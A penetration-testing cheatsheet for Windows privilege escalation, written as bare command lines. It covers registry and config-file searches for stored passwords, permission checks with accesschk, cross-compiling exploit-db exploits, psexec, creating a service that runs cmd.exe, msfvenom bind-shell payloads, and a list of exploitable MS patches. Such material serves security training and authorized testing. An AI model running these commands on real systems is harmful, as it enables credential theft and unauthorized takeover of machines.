Penetration Testing 102 - Windows Privilege Escalation Cheatsheet

OS and service pack

  • systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
  • ver

System name

  • hostname

Who are you?

  • whoami
  • echo %username%

Finding other users

  • net users
  • net user username

Clear-text passwords

  • c:\unattend.txt
  • c:\sysprep.ini - [Clear Text]
  • c:\sysprep\sysprep.xml - [Base64]
  • findstr /si password *.txt | *.xml | *.ini
  • reg query HKLM /s | findstr /i password > temp.txt
  • reg query HKCU /s | findstr /i password > temp.txt
  • reg query HKLM /f password /t REG_SZ /s
  • reg query HKCU /f password /t REG_SZ /s

Finding weak directory permissions

  • accesschk.exe /accepteula
  • accesschk.exe -uwdqs users c:\
  • accesschk.exe -uwdqs “Authenticated Users” c:\

Finding weak file permissions

  • accesschk.exe -uwqs users c:\*.*
  • accesschk.exe -uwqs “Authenticated Users” c:\*.*
  • cacls "c:\Program Files" /T | findstr Users

Weak Service permissions

  • accesschk.exe –uwcqv *

Cross compile exploits

  • cp /usr/share/exploitdb/platforms/windows/local/<exploit>.c /tmp/ 
  • cd /root/.wine/drive_c/MinGW/bin
  • wine gcc –o w00t.exe /tmp/<exploit>.c -l lib

PSexec

  • psexec.py <user>@<host> <cmd>
  • psexec.exe \\<host> <cmd>

Services

  • sc create <servicename> binpath= “c:\windows\system32\cmd.exe /k <pathtobinaryexecutable>” DisplayName= <displayname>
  • sc start <servicename>

Creating bind shells

  • msfvenom -p windows/shell_bind_tcp -f exe -o <Filename.exe> LPORT=<BindPort>
  • msfvenom -p windows/shell_bind_tcp -f dll -o <Filename.dll> LPORT=<BindPort>

Privilege Escalation Exploits by Patch

  • MS10-015
  • MS10-059
  • MS10-092
  • MS11-080
  • MS13-005
  • CVE-2013-3660
  • MS13-053
  • MS13-081
  • MS14-058
  • MS14-068
  • MS14-070
  • MS15-001
  • MS15-051
  • MS15-052